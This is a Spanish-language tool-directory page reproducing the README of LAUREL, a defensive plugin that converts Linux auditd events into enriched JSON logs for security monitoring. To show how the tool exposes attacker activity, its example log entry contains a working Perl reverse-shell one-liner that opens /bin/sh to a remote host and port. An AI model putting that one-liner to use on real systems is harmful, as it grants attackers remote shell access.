Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
laurel — Transforma los registros de auditoría de Linux para uso en SIEM | Kitploit
Herramientas/GitHubGitHub/threathunters-io/laurel
Herramientas DefensivasAnálisis de Registros
GitHubthreathunters-io/laurel

laurel

Transforma los registros de auditoría de Linux para uso en SIEM

Ver Repositorio
85165hace 3 díasRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

logotipo

Linux Audit – Registro utilizable, robusto y fácil

Build Status

LAUREL es un complemento de postprocesamiento de eventos para auditd(8) que genera registros de auditoría JSON enriquecidos y útiles, adecuados para configuraciones modernas de monitoreo de seguridad.

La documentación correspondiente a la última versión estable se puede encontrar aquí.

¿Por qué?

TLDR: En lugar de eventos de auditoría que se ven así…

root@kitploit:~
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…LAUREL los convierte en registros JSON donde el desorden que los atacantes/probadores de penetración/equipos rojos intentan crear se vuelve evidente de un vistazo:

root@kitploit:~
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

Esto ocurre en el origen porque LAUREL se ejecuta en el host donde se generan los eventos de auditoría. Los eventos se enriquecen con información útil sobre el proceso padre (ppid):

root@kitploit:~
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Documentación

Los detalles de configuración y operación se describen en la página de manual laurel(8). Los detalles sobre el formato de registro y las razones se pueden encontrar en la página de manual laurel-about(7). La página laurel-audit-rules(7) contiene consejos y ejemplos para configurar reglas de auditoría útiles para detectar las tácticas de los atacantes.

Las instrucciones de instalación de LAUREL contienen instrucciones sobre cómo compilar LAUREL desde el código fuente y cómo instalarlo y configurarlo.

Desarrollamos LAUREL porque no estábamos contentos con los conjuntos de características y las características de rendimiento de los proyectos y productos existentes. Consulte el documento Rendimiento para obtener más detalles.

Ver también

  • ansible-auditd-laurel, un rol de Ansible para implementar auditd + laurel, por @0xFustang / CERT-EU

Licencia

GNU General Public License, versión 3

Autores

  • Hilko Bengen <[email protected]>
  • Sergej Schmidt <[email protected]>

El logotipo fue creado por Birgit Meyer <[email protected]>.

Descargar herramienta